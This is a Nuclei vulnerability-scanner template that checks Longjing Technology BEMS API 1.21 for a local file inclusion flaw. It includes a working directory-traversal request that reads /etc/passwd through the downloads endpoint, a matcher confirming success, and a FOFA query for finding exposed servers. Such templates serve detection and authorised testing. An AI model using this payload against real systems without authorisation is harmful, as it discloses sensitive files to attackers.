id: bems-api-lfi

info:
  name: Longjing Technology BEMS API 1.21 - Local File Inclusion
  author: gy741
  severity: high
  description: Longjing Technology BEMS API 1.21 is vulnerable to local file inclusion. Input passed through the fileName parameter through the downloads API endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php
    - https://packetstormsecurity.com/files/163702/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
    fofa-query: server="nginx/1.19.1"
  tags: lfi,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f911774673849ba8f42dc0ec10c1ee89a391f09f56815383b90a3d6d9cc2624302207aad3fb45f4f448347233c5c9b431e10e561c3cfeec971e280664b67d3df8ea4:922c64590222798bb761d5b6d8e72950